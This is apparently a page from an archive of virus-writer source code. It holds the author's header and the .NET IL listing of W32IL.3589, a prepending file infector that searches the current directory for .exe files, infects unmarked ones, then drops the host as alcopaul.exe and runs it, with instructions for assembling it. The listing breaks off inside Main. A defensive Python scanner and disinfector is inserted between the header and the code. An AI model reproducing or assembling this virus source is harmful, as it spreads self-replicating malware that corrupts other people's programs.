29a-7.019

Virus source code collected from 29A
019
Page 1 of 3

////////////////////////////////////////////////////////////////////////////////////////////////////[3589.TXT]////////////////
//  //////W32IL.3589//////
//  //////////////////////
//
//  After writing my first d flat virus w32.syra (AKA w32.flatei by Mcafee/AVP, w32.flat by CA), i thought
//  of optimizing it a little bit. i dragged w32.syra at my ildasm, did some necessary mods and w32.3589
//  is born...
//  
//  w32.3589 is a variant of w32.syra which infects exe files in current directory.. infection : 1 file
//  at a time... it prepends itself to the victim file and when the victim is executed, the virus in it
//  infects another exe file in current directory, extracts the host bytes, writes this to "alcopaul.exe"
//  and executes "alcopaul.exe"..
//
//  the actual virus size is 3584 + 4 byte signature + 1 byte (?)...
//
//  system requirements : .net framework/sdk/w32
//
//  to produce the virus, go to msdos console, go to the directory where ilasm.exe resides, then type
//
//  ilasm 3589.txt /exe
//
//
//  with comments from me...
//
//  why w32il? w32 = windows platform, il = intermediate language.. :P
//
//
//  illawesome
//  [brigadaocho]
//  [rrlf]
//
//  greetz
//  
//  .syra ("my little sis.. study hard..")
//  .alcopaul ("LAME VB CODER! (this time, LAME C# coder) eherm.. heheheheh...")
//  .jackie ("expecting new stuffs from you man... the INTERVIEW.. hehehheh")
//  .slagehammer ("thanks for being there...")
//  .philie ("amsterdam!")
//  .ergrone ("cpl rulz.. anotha great delphi coder...")
//  .powerdryv ("my long lost sally oners..")
//  .quote from 29a6 article ".NET/dotNET virus" by benny/29a ("....Everything began when I started to explore 
//                             the .NET Common Language Runtime
//                             platform, designed by Microsoft. I wrote an article about it and started to
//                             work on one very trivial virus that could show how to use class librariez.
//                             Everything in C#.
//                             The idea was very simple - create sample of prepender written in C#. How easy
//                             it sounded, so hard to code it was. C#, such like Java have VERY STRICT type
//                             checking. And I figured out that there's NO easy way how to work with
//                             stringz - once a string is defined, you CAN'T change it - and I needed to
//                             do that, becoz it was very important for viral functionality.
//                             That sucked....")
//  .benny ("heh!. i did w32.syra in one day. anyways, thankie for the inspiration.. heheehh")
//  .brigadaocho ("b8 ezine #1!")
//  .rrlf ("rrlf #3!")
//  .diskordia/[rrlf] ("hottie!")
//  .johnlw ("read the gnu/gpl!")
//  .kahuna ("let's be friends.. hehheeheh")
//  .LJ ("thanks for producing vxtasy.. the definitive guide man..")  
//  .Energy ("kewl vb codes, and delphi codes too.. suggestion : p2p worms suck.. :)")
//  .Arkhangel ("heya, boss")
//  .
//  .most of all, my vx soulmate PetiK ("hey man. cum back to the scene and let's rock the casbah.. :)")
//
//  e-mail me at alcopaulvx@yahoo.com
//  see my codes at http://alcopaul.cjb.net
//  http://brigadaocho.host.sk  
//
//  september 12, 2002 : edited the disasm comments and added some greets
//
//  
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

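The header above and the listing's own comments give a defender everything needed to recognise and undo this prepender: the virus image is 0xE00 = 3584 bytes, the infection marker is the 4-byte string "paul" checked at file length minus 4, the host is whatever sits between those two, and the host is dropped to "alcopaul.exe" in the current directory before being launched. The following is an added example written for this page (it is not code from the 29A archive or from the virus author): a small Python scanner and host-recovery helper built from those facts alone. The "+ 1 byte (?)" in the header is left uncertain by the author, so the helper treats everything between offset 3584 and the marker as host bytes; the 3584-byte fixture it builds is zero filler standing in for the image, not the image itself.

```python
"""Recognise and disinfect files carrying the W32IL.3589 prepender layout.

Added example for this listing; not code from the 29A archive or the author.
Layout taken from the listing's comments:

    [0xE00 = 3584 bytes of virus image][original host bytes][4-byte marker b"paul"]

The virus identifies an already-infected file by seeking to length-4 and comparing
the text there with "paul", and rebuilds the host by reading everything after
offset 3584 into "alcopaul.exe". Those two facts suffice for the reverse operation.
"""
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

VIRUS_SIZE = 0xE00              # 3584: constant the IL seeks past (IL_00d2 / IL_00e1)
MARKER = b"paul"                # 4-byte signature compared at IL_0077
DROPPED_HOST = "alcopaul.exe"   # temporary host file written, then ShellExecute'd


def is_infected(data: bytes) -> bool:
    """Marker in the last 4 bytes, with room for the prepended image and a host.

    The length guard also covers the case the virus itself handles by exception:
    a file shorter than 4 bytes makes its Seek(length - 4) fail.
    """
    if len(data) <= VIRUS_SIZE + len(MARKER):
        return False
    return data[-len(MARKER):] == MARKER


def recover_host(data: bytes) -> bytes:
    """Return the original host: strip the 3584-byte image and the trailing marker."""
    if not is_infected(data):
        raise ValueError("file does not carry the 3589 marker/layout")
    return data[VIRUS_SIZE:-len(MARKER)]


def scan_directory(directory: Path, pattern: str = "*.exe") -> List[Path]:
    """Same enumeration the virus performs (GetFiles(cwd, "*.exe")), used defensively."""
    hits = []
    for path in sorted(directory.glob(pattern)):
        if path.is_file() and is_infected(path.read_bytes()):
            hits.append(path)
    return hits


def has_dropped_host(directory: Path) -> bool:
    """Runtime artefact: the virus writes alcopaul.exe beside the victim and only
    deletes it after launching the host, so its presence is worth alerting on."""
    return (directory / DROPPED_HOST).is_file()


def make_constructed_sample() -> Tuple[bytes, bytes]:
    """Constructed fixture, not a real virus image: 3584 zero bytes stand in for the
    prepended code, followed by a fake host and the marker. Returns (infected, host)."""
    filler = b"\x00" * VIRUS_SIZE
    host = b"MZ" + b"constructed-host-program-bytes"
    return filler + host + MARKER, host


def write_and_scan(samples: Dict[str, bytes]) -> List[str]:
    """Write name->bytes samples into a temporary directory, scan it, and return
    the file names that were flagged (the directory is removed afterwards)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, data in samples.items():
            (root / name).write_bytes(data)
        return [p.name for p in scan_directory(root)]


if __name__ == "__main__":
    infected, host = make_constructed_sample()
    print("infected sample flagged:", is_infected(infected))
    print("host recovered intact:", recover_host(infected) == host)
    print("flagged in directory scan:",
          write_and_scan({"victim.exe": infected, "clean.exe": host}))
```

Because the marker check is exactly the one the virus uses to avoid reinfecting a file, any file that passes `is_infected` is one the virus would also skip, which makes the check a reliable first filter; `recover_host` then restores the original bytes without executing anything, unlike the virus's own extract-and-run path.
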
.module extern shell32.dll
.assembly extern mscorlib{}
.assembly v3589{}
.subsystem 0x00000002
.class private auto ansi beforefieldinit v3589_
       extends [mscorlib]System.Object
{
  .class auto ansi nested public beforefieldinit Win32
         extends [mscorlib]System.Object
  {
    .method public hidebysig static pinvokeimpl("shell32.dll" autochar winapi) 
            int32  ShellExecute(int32 hWnd,
                                string oper,
                                string file,
                                string param,
                                string dir,
                                int32 type) cil managed preservesig
    {
    } // essential win32api coz .net framework is not installed fully in my windows me... system.diagnostics.process can't be found..
    .method public hidebysig specialname rtspecialname 
            instance void  .ctor() cil managed
    {
      .maxstack  8
      IL_0000:  ldarg.0
      IL_0001:  call       instance void [mscorlib]System.Object::.ctor()
      IL_0006:  ret
    } // in every class, .ctor should be present..

  }

  .method public hidebysig static void  Main(string[] args) cil managed
  {
    .entrypoint
    // Code size       431 (0x1af)
    .maxstack  6
    .locals (class [mscorlib]System.Reflection.Module V_0,
             string[] V_1,
             string V_2,
             class [mscorlib]System.IO.FileStream V_3,
             class [mscorlib]System.IO.StreamReader V_4,
             int32 V_5,
             int32 V_6,
             string V_7,
             string V_8,
             class [mscorlib]System.IO.FileStream V_9,
             class [mscorlib]System.IO.BinaryReader V_10,
             int32 V_11,
             int32 V_12,
             unsigned int8[] V_13,
             int32 V_14,
             int32 V_15,
             int32 V_16,
             class [mscorlib]System.IO.FileStream V_17,
             class [mscorlib]System.IO.BinaryWriter V_18,
             string V_19,
             string[] V_20,
             int32 V_21)
    IL_0000:  call       class [mscorlib]System.Reflection.Assembly [mscorlib]System.Reflection.Assembly::GetExecutingAssembly()
    IL_0005:  callvirt   instance class [mscorlib]System.Reflection.Module[] [mscorlib]System.Reflection.Assembly::GetModules()
    IL_000a:  ldc.i4.0
    IL_000b:  ldelem.ref // reflection
    IL_000c:  stloc.0
    IL_000d:  call       string [mscorlib]System.IO.Directory::GetCurrentDirectory()
    IL_0012:  ldstr      "*.exe"
    IL_0017:  call       string[] [mscorlib]System.IO.Directory::GetFiles(string,
                                                                          string)
    IL_001c:  stloc.1
    IL_001d:  ldloc.1
    IL_001e:  stloc.s    V_20 // list all exe files of current directory to array
    IL_0020:  ldc.i4.0
    IL_0021:  stloc.s    V_21
    IL_0023:  br.s       IL_00a3 // if no files available, extract host

    IL_0025:  ldloc.s    V_20
    IL_0027:  ldloc.s    V_21
    IL_0029:  ldelem.ref      // examine victim for sig
    IL_002a:  stloc.2
    IL_002b:  ldloc.2
    IL_002c:  ldc.i4.4
    IL_002d:  ldc.i4.1
    IL_002e:  newobj     instance void [mscorlib]System.IO.FileStream::.ctor(string,
                                                                             valuetype [mscorlib]System.IO.FileMode,
                                                                             valuetype [mscorlib]System.IO.FileAccess) // open
    IL_0033:  stloc.3
    IL_0034:  ldloc.3
    IL_0035:  newobj     instance void [mscorlib]System.IO.StreamReader::.ctor(class [mscorlib]System.IO.Stream) // read
    IL_003a:  stloc.s    V_4
    IL_003c:  ldloc.3
    IL_003d:  callvirt   instance int64 [mscorlib]System.IO.Stream::get_Length() // get full length of victim
    IL_0042:  conv.i4
    IL_0043:  stloc.s    V_5 // V_5 contains its length
    IL_0045:  ldloc.s    V_5
    IL_0047:  ldc.i4.4
    IL_0048:  sub            // V_5 - 4
    IL_0049:  stloc.s    V_6  // store result to V_6
    IL_004b:  ldloc.s    V_4 // init variable for the signature...
    IL_004d:  callvirt   instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.StreamReader::get_BaseStream()
    IL_0052:  ldloc.s    V_6 // offset
    IL_0054:  conv.i8    // convert V_6 to int64
    IL_0055:  ldc.i4.0   // origin
    IL_0056:  callvirt   instance int64 [mscorlib]System.IO.Stream::Seek(int64,
                                                                         valuetype [mscorlib]System.IO.SeekOrigin)
    IL_005b:  pop
    IL_005c:  ldloc.s    V_4 // load object
    IL_005e:  callvirt   instance string [mscorlib]System.IO.TextReader::ReadLine()
    IL_0063:  stloc.s    V_7 // V_7 = read 4 bytes at the end
    IL_0065:  ldloc.s    V_4
    IL_0067:  callvirt   instance void [mscorlib]System.IO.TextReader::Close()
    IL_006c:  ldstr      "paul"
    IL_0071:  stloc.s    V_8
    IL_0073:  ldloc.s    V_7 // 4 bytes
    IL_0075:  ldloc.s    V_8 // "paul"
    IL_0077:  call       bool [mscorlib]System.String::op_Equality(string,
                                                                   string) // check for virus signature , 4 bytes = "paul"?
    IL_007c:  brfalse.s  IL_0080 // false goto 0080

    IL_007e:  br.s       IL_009d // true, next victim in array

    IL_0080:  ldloc.2 // check if the file is infecting itself
    IL_0081:  ldloc.0 // victim name
    IL_0082:  callvirt   instance string [mscorlib]System.Reflection.Module::get_FullyQualifiedName() // virus name
    IL_0087:  call       bool [mscorlib]System.String::op_Equality(string,
                                                                   string)
    IL_008c:  brfalse.s  IL_0090 // false goto infest (0090)

    IL_008e:  br.s       IL_009d // true, next victim in array

    .try // use Exception handling
    {
      IL_0090:  ldloc.2
      IL_0091:  call       void v3589_::infest(string) // infect file
      IL_0096:  leave.s    IL_009b // finished then extract and execute the victim..

    }
    catch [mscorlib]System.Object 
    {
      IL_0098:  pop
      IL_0099:  leave.s    IL_009d // if error, next victim

    }
    IL_009b:  br.s       IL_00ae

    IL_009d:  ldloc.s    V_21 // next victim in array
    IL_009f:  ldc.i4.1
    IL_00a0:  add
    IL_00a1:  stloc.s    V_21
    IL_00a3:  ldloc.s    V_21
    IL_00a5:  ldloc.s    V_20
    IL_00a7:  ldlen
    IL_00a8:  conv.i4
    IL_00a9:  blt        IL_0025 // repeat itself

    IL_00ae:  ldloc.0
    IL_00af:  callvirt   instance string [mscorlib]System.Reflection.Module::get_FullyQualifiedName() // ilasm version of app.path & "\" & app.exename & ".exe"
    IL_00b4:  ldc.i4.4   //  open or create
    IL_00b5:  ldc.i4.1   //  read itself
    IL_00b6:  newobj     instance void [mscorlib]System.IO.FileStream::.ctor(string,
                                                                             valuetype [mscorlib]System.IO.FileMode,
                                                                             valuetype [mscorlib]System.IO.FileAccess)
    IL_00bb:  stloc.s    V_9
    IL_00bd:  ldloc.s    V_9 // pass variable to Binary Reader
    IL_00bf:  newobj     instance void [mscorlib]System.IO.BinaryReader::.ctor(class [mscorlib]System.IO.Stream) // new object
    IL_00c4:  stloc.s    V_10 // store the result in V_10
    IL_00c6:  ldloc.s    V_9 // FileStream object
    IL_00c8:  callvirt   instance int64 [mscorlib]System.IO.Stream::get_Length() // c# version : int V_11 = (int) V_9.Length
    IL_00cd:  conv.i4    // force conversion
    IL_00ce:  stloc.s    V_11 // store the result to V_11
    IL_00d0:  ldloc.s    V_11 // load V_11
    IL_00d2:  ldc.i4     0xE00 // 3584
    IL_00d7:  sub
    IL_00d8:  stloc.s    V_12
    IL_00da:  ldloc.s    V_10
    IL_00dc:  callvirt   instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryReader::get_BaseStream()
    IL_00e1:  ldc.i4     0xE00 // 3584 offset (skip virus bytes.. read host bytes)
    IL_00e6:  conv.i8        // convert 3584 to int64; it becomes the first parameter of Seek
    IL_00e7:  ldc.i4.0       // origin, 0
    IL_00e8:  callvirt   instance int64 [mscorlib]System.IO.Stream::Seek(int64,
                                                                         valuetype [mscorlib]System.IO.SeekOrigin)
    IL_00ed:  pop
    IL_00ee:  ldloc.s    V_12
    IL_00f0:  conv.ovf.u4
    IL_00f1:  newarr     [mscorlib]System.Byte // initialize byte array
    IL_00f6:  stloc.s    V_13
    IL_00f8:  ldloc.s    V_12
    IL_00fa:  stloc.s    V_14
    IL_00fc:  ldc.i4.0
    IL_00fd:  stloc.s    V_15
    IL_00ff:  br.s       IL_0124

    IL_0101:  ldloc.s    V_10 // initialize binaryreader
    IL_0103:  ldloc.s    V_13 // bytes
    IL_0105:  ldloc.s    V_15 // number of bytes read
    IL_0107:  ldloc.s    V_14 // number of bytes to read
    IL_0109:  callvirt   instance int32 [mscorlib]System.IO.BinaryReader::Read(unsigned int8[],
                                                                               int32,
                                                                               int32)
    // read all bytes
    IL_010e:  stloc.s    V_16 
    IL_0110:  ldloc.s    V_16
    IL_0112:  brtrue.s   IL_0116

    IL_0114:  br.s       IL_0129

    IL_0116:  ldloc.s    V_15
    IL_0118:  ldloc.s    V_16
    IL_011a:  add
    IL_011b:  stloc.s    V_15
    IL_011d:  ldloc.s    V_14
    IL_011f:  ldloc.s    V_16
    IL_0121:  sub
    IL_0122:  stloc.s    V_14
    IL_0124:  ldloc.s    V_14
    IL_0126:  ldc.i4.0
    IL_0127:  bgt.s      IL_0101
    // end read loop
    IL_0129:  ldloc.s    V_10
    IL_012b:  callvirt   instance void [mscorlib]System.IO.BinaryReader::Close() // close file
    IL_0130:  ldstr      "alcopaul.exe" // host file name
    IL_0135:  ldc.i4.4   // open or create
    IL_0136:  ldc.i4.2  // write
    IL_0137:  newobj     instance void [mscorlib]System.IO.FileStream::.ctor(string,
                                                                             valuetype [mscorlib]System.IO.FileMode,
                                                                             valuetype [mscorlib]System.IO.FileAccess)
    IL_013c:  stloc.s    V_17
    IL_013e:  ldloc.s    V_17
    IL_0140:  newobj     instance void [mscorlib]System.IO.BinaryWriter::.ctor(class [mscorlib]System.IO.Stream)
    IL_0145:  stloc.s    V_18
    IL_0147:  ldloc.s    V_18
    IL_0149:  callvirt   instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryWriter::get_BaseStream()
    IL_014e:  ldc.i4.0  // beginning
    IL_014f:  conv.i8   // convert to int64
    IL_0150:  ldc.i4.0  // beginning
    IL_0151:  callvirt   instance int64 [mscorlib]System.IO.Stream::Seek(int64,
                                                                         valuetype [mscorlib]System.IO.SeekOrigin)
    IL_0156:  pop
    IL_0157:  ldloc.s    V_18
    IL_0159:  ldloc.s    V_13  // host bytes
    IL_015b:  callvirt   instance void [mscorlib]System.IO.BinaryWriter::Write(unsigned int8[])
    IL_0160:  ldloc.s    V_18
    IL_0162:  callvirt   instance void [mscorlib]System.IO.BinaryWriter::Close() // close alcopaul.exe
    IL_0167:  call       string [mscorlib]System.IO.Directory::GetCurrentDirectory() // get current directory
    IL_016c:  stloc.s    V_19 // store path to V_19
    // shellexecute api
    IL_016e:  ldc.i4.0   // 0  
    IL_016f:  ldnull     // null
    IL_0170:  ldstr      "alcopaul.exe" // filename
    IL_0175:  ldnull     // null
    IL_0176:  ldloc.s    V_19 // current directory 
    IL_0178:  ldc.i4.1   // show normal
    IL_0179:  call       int32 v3589_/Win32::ShellExecute(int32,
                                                                         string,
                                                                         string,
                                                                         string,
                                                                         string,
                                                                         int32) // shell execute host
    IL_017e:  pop
    //use seh to delete alcopaul.exe
    .try
    {
      IL_017f:  ldstr      "alcopaul.exe"
      IL_0184:  call       void [mscorlib]System.IO.File::Delete(string) 
      IL_0189:  leave.s    IL_018e // check if alcopaul.exe exists

    }  // end .try
    catch [mscorlib]System.Object 
    {
      IL_018b:  pop
      IL_018c:  leave.s    IL_017f

    }  // end handler
    IL_018e:  ldstr      "alcopaul.exe"
    IL_0193:  call       bool [mscorlib]System.IO.File::Exists(string)
    IL_0198:  brfalse.s  IL_019c // false then end virus

    IL_019a:  br.s       IL_017f // host temp file still exists, goto del alcopaul.exe
